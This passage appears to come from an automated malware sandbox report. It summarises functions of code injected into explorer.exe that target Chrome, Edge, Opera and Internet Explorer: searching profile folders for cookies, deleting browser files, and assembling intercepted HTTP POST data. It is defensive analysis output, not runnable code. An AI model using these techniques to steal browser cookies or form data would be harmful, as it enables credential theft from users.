                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • wsprintfW.USER32 ref: 0322142A
                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 03221439
                                                                                                                                      • wsprintfW.USER32 ref: 03221476
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 0322150D
                                                                                                                                        • Part of subcall function 032214D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 03221557
                                                                                                                                        • Part of subcall function 032214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
                                                                                                                                        • Part of subcall function 032214D8: DeleteFileW.KERNEL32(00000000), ref: 03221571
                                                                                                                                        • Part of subcall function 032214D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
                                                                                                                                        • Part of subcall function 032214D8: FindClose.KERNEL32(00000000), ref: 0322158F
                                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000), ref: 0322149C
                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 032214AF
                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 032214BA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                      • String ID: %s%s$%s%s\$*.*
                                                                                                                                      • API String ID: 2055899612-4093207852
                                                                                                                                      • Opcode ID: dcbbdcdee3393bab948b866a06f9f496c2fa9667814a34f5674f3d4f03e3a5b3
                                                                                                                                      • Instruction ID: 62b522d571a24f88dfc37dc7da204dd13b4057a15b34a54e54f7c9c607b1e608
                                                                                                                                      • Opcode Fuzzy Hash: dcbbdcdee3393bab948b866a06f9f496c2fa9667814a34f5674f3d4f03e3a5b3
                                                                                                                                      • Instruction Fuzzy Hash: FF11D2302143607BD324FB26EC48E7FBEDCAFD5705F04052DF95582182DB796999C662
                                                                                                                                      Function 0322118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 032211A9
                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 032211C1
                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 032211C9
                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 032211D4
                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 032211EE
                                                                                                                                      • wsprintfA.USER32 ref: 03221205
                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 0322121E
                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 03221228
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                      • String ID: %02X
                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                      • Opcode ID: f0cb59301fabeb1688c4fc349c24a1cdb57ddf680fe7eeb220585049fb19ef4a
                                                                                                                                      • Instruction ID: 67c35db826a24fd406ed4d8131a742023c717ec3d0f2043e033a4e5173ce2fa4
                                                                                                                                      • Opcode Fuzzy Hash: f0cb59301fabeb1688c4fc349c24a1cdb57ddf680fe7eeb220585049fb19ef4a
                                                                                                                                      • Instruction Fuzzy Hash: 09115B71900108BFDB21AF96FC8CEAEBFBCEB48700F108065F504E2110DA715E919B60
                                                                                                                                      Function 03222E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03222EC5), ref: 03222E27
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03222E52
                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03222E7F
                                                                                                                                      • StrStrIW.SHLWAPI(?,NetworkService), ref: 03222E92
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                                                                                                      • String ID: NetworkService
                                                                                                                                      • API String ID: 1656241333-2019834739
                                                                                                                                      • Opcode ID: c22a7e761214075691784a472edfa4a3d75cc1774285b4ea064ea8fa9b29162b
                                                                                                                                      • Instruction ID: a6ddf2bde9dc87176867bfb12097b9e5e9e2dedef17e27ee8fcf67c1edc2c5e7
                                                                                                                                      • Opcode Fuzzy Hash: c22a7e761214075691784a472edfa4a3d75cc1774285b4ea064ea8fa9b29162b
                                                                                                                                      • Instruction Fuzzy Hash: 9701B165210355BFD324BA239C48F6B7E9DEB98792F008429B90AD6145DAA5A8808660
                                                                                                                                      Function 03221E4C Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 03221E83
                                                                                                                                      • LoadLibraryA.KERNEL32(?,03226058,00000000,00000000,75572EE0,00000000,032220DC,?), ref: 03221EAB
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03221ED8
                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03221F29
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                      • Opcode ID: afd726bb9c20f0756106961db05e95e3d1a8f0fe1e925a07b65082279fcef80b
                                                                                                                                      • Instruction ID: ba3f78ea9b91d0d7c8b6c19065223ab157cae25f428adcf3e79e7101bfd71141
                                                                                                                                      • Opcode Fuzzy Hash: afd726bb9c20f0756106961db05e95e3d1a8f0fe1e925a07b65082279fcef80b
                                                                                                                                      • Instruction Fuzzy Hash: C2317072710226BBCB28CF29CC84F66BB98FF05354B18456CE856C7601D765F8A5C7A0
                                                                                                                                      Function 03222974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 228 3222974-32229a2 229 3222b65-3222b6d 228->229 230 32229a8-32229aa 228->230 230->229 231 32229b0-32229b9 call 3221765 230->231 231->229 234 32229bf-32229c1 231->234 234->229 235 32229c7-32229c9 234->235 235->229 236 32229cf-32229df call 3221141 235->236 236->229 239 32229e5-3222a0d call 3221000 * 3 236->239 246 3222a11 call 322104c 239->246 247 3222a16-3222a30 call 322285f 246->247 250 3222a32-3222a42 call 322285f 247->250 251 3222a4c-3222a64 call 322285f 247->251 250->251 258 3222a44-3222a4a lstrcat 250->258 256 3222a66-3222a6c lstrcat 251->256 257 3222a6e-3222a85 call 322285f 251->257 256->257 261 3222a87-3222a8d lstrcat 257->261 262 3222a8f-3222ab2 RtlZeroMemory call 322285f 257->262 258->251 261->262 265 3222ac3 262->265 266 3222ab4-3222ac1 StrToIntA 262->266 267 3222ac7-3222ac9 265->267 266->267 268 3222b42-3222b64 call 322105d call 3221011 * 3 267->268 269 3222acb-3222ace 267->269 268->229 269->268 271 3222ad0-3222ad7 269->271 271->268 273 3222ad9-3222adf 271->273 275 3222ae5 call 322104c 273->275 277 3222aea-3222b29 wnsprintfA call 32228ad 275->277 282 3222b2b-3222b2d lstrcat 277->282 283 3222b2f-3222b3e lstrcat * 2 277->283 282->283 283->268
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                        • Part of subcall function 0322104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,03222A16,?,00000001), ref: 03221056
                                                                                                                                        • Part of subcall function 0322285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 032228A2
                                                                                                                                      • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 03222A4A
                                                                                                                                      • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 03222A6C
                                                                                                                                      • lstrcat.KERNEL32(?,dyn_header_ua), ref: 03222A8D
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 03222A96
                                                                                                                                      • StrToIntA.SHLWAPI(00000000), ref: 03222AB9
                                                                                                                                      • wnsprintfA.SHLWAPI ref: 03222B0D
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 03222B2D
                                                                                                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 03222B35
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 03222B3C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                                                                                                                      • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                                                                                                                      • API String ID: 2605944266-950501416
                                                                                                                                      • Opcode ID: a40f93ba0e5149ed0f2d6b8d2b7e407119a87e779b79eed0295175edec4c5eab
                                                                                                                                      • Instruction ID: ed314800bde859b7bdae49fcedaa9159929c46fdfa4c90a78d0044db88526b93
                                                                                                                                      • Opcode Fuzzy Hash: a40f93ba0e5149ed0f2d6b8d2b7e407119a87e779b79eed0295175edec4c5eab
                                                                                                                                      • Instruction Fuzzy Hash: 0951C134614361BFC715FF268C84F2EBEDAAF88204F04085CF8455B241CBB5ED858762
                                                                                                                                      Function 03222FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(?,?,?,00000000,?,032229DD,00000001), ref: 03221150
                                                                                                                                        • Part of subcall function 03221141: lstrlen.KERNEL32(:method POST,?,00000000,?,032229DD,00000001), ref: 03221155
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000000A), ref: 03222FFA
                                                                                                                                      • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223024
                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223052
                                                                                                                                      • wsprintfA.USER32 ref: 032230B9
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 032230E5
                                                                                                                                      • lstrcat.KERNEL32(?,{:!:}), ref: 032230F8
                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,03226038), ref: 03223109
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000), ref: 03223112
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                                                                                                                                      • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                                                                                                                      • API String ID: 2886538537-1627781280
                                                                                                                                      • Opcode ID: a5e5aa8df1be211eb6dbf9d666455775430f2f19c1f4b379641f423979c43963
                                                                                                                                      • Instruction ID: fc31cb63d258a50d87ab9a5d1bb8a386565afa26bed69a525f4cb9cd14db00c3
                                                                                                                                      • Opcode Fuzzy Hash: a5e5aa8df1be211eb6dbf9d666455775430f2f19c1f4b379641f423979c43963
                                                                                                                                      • Instruction Fuzzy Hash: FD3116353203657BD714FA229C55F6F3E99DBD0B40F00842CF8028F285DAB9E9858BA1
                                                                                                                                      Function 03223709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73stringsleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                        • Part of subcall function 03221363: Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                        • Part of subcall function 03221363: CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                        • Part of subcall function 03221363: lstrcmpiA.KERNEL32(?), ref: 032213A3
                                                                                                                                        • Part of subcall function 03221363: Process32Next.KERNEL32(00000000,00000128), ref: 032213C0
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223731
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223752
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223764
                                                                                                                                        • Part of subcall function 032215BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,755AF770,00000000,76EEB2E0,774783D0), ref: 032215EB
                                                                                                                                        • Part of subcall function 032215BE: FindFirstFileW.KERNEL32(00000000,?), ref: 032215F7
                                                                                                                                        • Part of subcall function 032215BE: lstrcmpiW.KERNEL32(?,032241C8), ref: 03221623
                                                                                                                                        • Part of subcall function 032215BE: lstrcmpiW.KERNEL32(?,032241CC), ref: 03221633
                                                                                                                                        • Part of subcall function 032215BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0322164C
                                                                                                                                        • Part of subcall function 032215BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0322169C
                                                                                                                                        • Part of subcall function 032215BE: FindClose.KERNEL32(00000000), ref: 032216AB
                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0322377A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 03223783
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 0322378F
                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 032237A3
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 032237AC
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,03223839,?,03223C53,00000001), ref: 032237B8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                                      • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                                      • API String ID: 909495591-1175993956
                                                                                                                                      • Opcode ID: ec8c9c0d8d1a206c011f8c3204177114d92cabb7d7c615f1febe570ea94e51f4
                                                                                                                                      • Instruction ID: e5c3217217f9b1df2baa4213cc0b7c4cffc79ded29bcefaced4f4b048e0134f1
                                                                                                                                      • Opcode Fuzzy Hash: ec8c9c0d8d1a206c011f8c3204177114d92cabb7d7c615f1febe570ea94e51f4
                                                                                                                                      • Instruction Fuzzy Hash: DE113E243A177836E434F6232C82F7FAC4ACFA1A81F110004F6066EAC4CED4AAC105AE
                                                                                                                                      Function 032235D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64stringsleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03221363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03221374
                                                                                                                                        • Part of subcall function 03221363: Process32First.KERNEL32(00000000,?), ref: 03221393
                                                                                                                                        • Part of subcall function 03221363: CloseHandle.KERNEL32(00000000), ref: 032213CB
                                                                                                                                        • Part of subcall function 03221363: lstrcmpiA.KERNEL32(?), ref: 032213A3
                                                                                                                                        • Part of subcall function 03221363: Process32Next.KERNEL32(00000000,00000128), ref: 032213C0
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,00000000,?,0322382F,?,03223C53,00000001), ref: 032235FA
                                                                                                                                        • Part of subcall function 03221000: GetProcessHeap.KERNEL32(00000008,00000208,03221418), ref: 03221003
                                                                                                                                        • Part of subcall function 03221000: RtlAllocateHeap.NTDLL(00000000), ref: 0322100A
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223613
                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223623
                                                                                                                                      • wsprintfW.USER32 ref: 03223644
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 0322150D
                                                                                                                                        • Part of subcall function 032214D8: FindFirstFileW.KERNEL32(00000000,?), ref: 0322151C
                                                                                                                                        • Part of subcall function 032214D8: wsprintfW.USER32 ref: 03221557
                                                                                                                                        • Part of subcall function 032214D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0322156A
                                                                                                                                        • Part of subcall function 032214D8: DeleteFileW.KERNEL32(00000000), ref: 03221571
                                                                                                                                        • Part of subcall function 032214D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 03221584
                                                                                                                                        • Part of subcall function 032214D8: FindClose.KERNEL32(00000000), ref: 0322158F
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223672
                                                                                                                                      • lstrcatW.KERNEL32(00000000,03224614,?,00000000,?,0322382F,?,03223C53,00000001), ref: 03223682
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                                      • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                                      • API String ID: 2436889709-3669280581
                                                                                                                                      • Opcode ID: 7c38492aed142707d7b5b6de689553ff60555c24d497951bd7777a4dcf176165
                                                                                                                                      • Instruction ID: da77a28de15ad1e39bff4ef76d4ac30d5a53d4a1d732c294130b06e9dc4587d7
                                                                                                                                      • Opcode Fuzzy Hash: 7c38492aed142707d7b5b6de689553ff60555c24d497951bd7777a4dcf176165
                                                                                                                                      • Instruction Fuzzy Hash: 7D1170343703613BE624B7676C99F3E2D5ADBE6F41F450018FA06AA2C4CED819D08279
                                                                                                                                      Function 03223132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 392 3223132-3223147 393 32232ea-32232f1 392->393 394 322314d-3223179 392->394 396 3223185-32231e7 call 3221000 394->396 397 322317b-322317f 394->397 403 3223201-3223226 call 3221000 396->403 404 32231e9-32231fa 396->404 397->393 397->396 408 32232d8-32232e9 call 3221011 * 2 403->408 409 322322c-3223237 lstrlen 403->409 404->403 408->393 409->408 411 322323d-322324f call 3221141 409->411 411->408 417 3223255-32232d2 call 3221000 * 2 wsprintfA lstrcat call 3221011 lstrcat lstrlen RtlMoveMemory 411->417 417->408
                                                                                                                                      APIs
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0322322D
                                                                                                                                      • wsprintfA.USER32 ref: 0322329E
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 032232AF
                                                                                                                                      • lstrcat.KERNEL32(00000000,{:!:}), ref: 032232BE
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 032232C1
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 032232D2
                                                                                                                                        • Part of subcall function 03221011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,032214CB), ref: 03221020
                                                                                                                                        • Part of subcall function 03221011: HeapFree.KERNEL32(00000000), ref: 03221027
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                                                                                                                      • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                                                                                                                      • API String ID: 3430864794-1604029033
                                                                                                                                      • Opcode ID: 48e3c9db3f76ff5854a7315b56ad48ffe4a8549ee4a62f583aee0a03fbeaf6d5
                                                                                                                                      • Instruction ID: dd4133500aa42c584bed1fe6f98198a614fab987f1f1ee012134b866ad4ab28b
                                                                                                                                      • Opcode Fuzzy Hash: 48e3c9db3f76ff5854a7315b56ad48ffe4a8549ee4a62f583aee0a03fbeaf6d5
                                                                                                                                      • Instruction Fuzzy Hash: 86418F75104355BFD320EF10DC48E6BBBECFB94345F044A2EF94296241DBB5AA48CBA2
                                                                                                                                      Function 03223449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 425 3223449-322346c RtlEnterCriticalSection 426 32234d4-32234dc 425->426 427 322346e-3223474 425->427 428 32234e2-32234eb call 3221274 426->428 429 32235bc-32235cb RtlLeaveCriticalSection 426->429 427->426 430 3223476-3223478 427->430 428->429 435 32234f1-32234f7 428->435 430->429 432 322347e-3223487 call 3221274 430->432 432->426 439 3223489-3223496 call 3221274 432->439 437 32235b3-32235b7 call 3222d06 435->437 438 32234fd-3223520 RtlZeroMemory call 3222f3d 435->438 437->429 438->429 445 3223526-3223535 StrToIntA 438->445 439->426 446 3223498-32234bc lstrcat call 3222faa 439->446 445->429 447 322353b-322354d call 3221141 445->447 452 32234be call 3222f1f 446->452 447->429 454 322354f-3223556 447->454 453 32234c3-32234ce call 322105d 452->453 453->426 455 3223595-32235aa call 3222faa 454->455 456 3223558-322356d 454->456 467 32235ac call 3222f1f 455->467 458 322357b-322357e 456->458 459 322356f-3223574 call 322105d 456->459 463 3223580 call 322104c 458->463 459->458 466 3223585-3223593 RtlMoveMemory 463->466 466->429 468 32235b1 467->468 468->429
                                                                                                                                      APIs
                                                                                                                                      • RtlEnterCriticalSection.NTDLL(03226038), ref: 03223455
                                                                                                                                      • lstrcat.KERNEL32 ref: 032234AB
                                                                                                                                        • Part of subcall function 03222FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 03222FFA
                                                                                                                                        • Part of subcall function 03222FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223024
                                                                                                                                        • Part of subcall function 03222FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,03223347), ref: 03223052
                                                                                                                                        • Part of subcall function 03222FAA: wsprintfA.USER32 ref: 032230B9
                                                                                                                                        • Part of subcall function 03222FAA: lstrcat.KERNEL32(00000000,00000000), ref: 032230E5
                                                                                                                                        • Part of subcall function 03222F1F: CreateThread.KERNEL32(00000000,00000000,03222ED2,?,00000000,00000000), ref: 03222F2F
                                                                                                                                        • Part of subcall function 03222F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 03222F36
                                                                                                                                        • Part of subcall function 0322105D: VirtualFree.KERNEL32(?,00000000,00008000,03222B4B), ref: 03221065
                                                                                                                                      • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 03223504
                                                                                                                                      • StrToIntA.SHLWAPI(?,00000000,?), ref: 0322352B
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0322358D
                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(03226038), ref: 032235C1
                                                                                                                                        • Part of subcall function 03221274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03221281
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000009.00000002.3926517846.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_9_2_3221000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                                      • String ID: $Content-Length:$POST
                                                                                                                                      • API String ID: 2960674810-114478848
                                                                                                                                      • Opcode ID: 36cecb3efe401ba15b9d1ec0bad8c8e80254e825ccd4a66fa27eb575bca67d19
                                                                                                                                      • Instruction ID: 0bc6c0205b026079597c781345f5f2f3b16c94aa6fa11c5f7ef7ad1fe6cb6f1d
                                                                                                                                      • Opcode Fuzzy Hash: 36cecb3efe401ba15b9d1ec0bad8c8e80254e825ccd4a66fa27eb575bca67d19
